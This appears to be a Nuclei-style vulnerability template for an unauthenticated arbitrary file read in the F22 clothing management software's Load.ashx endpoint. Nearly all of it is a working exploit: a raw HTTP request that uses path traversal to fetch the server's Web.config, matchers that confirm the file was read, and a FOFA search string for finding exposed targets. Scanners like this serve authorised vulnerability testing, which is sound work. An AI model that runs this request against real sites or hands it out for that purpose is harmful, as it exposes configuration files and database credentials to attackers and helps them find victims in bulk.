http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - <configuration>
            - </configuration>
            - machine.config.comments
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../Web.config HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
id: F22-Load_ashx-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="b28web/Utility/"
        F22服装管理软件系统 Load.ashx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: F22服装管理软件系统 Load.ashx 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488930&idx=1&sn=38ba1af39ba20125ed649d159c5f43ff&chksm=c267a091f510298705b8039d4c4578499ed9eff868e0a7de19c468b7ad33aa6526c973e91549&token=385896921&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
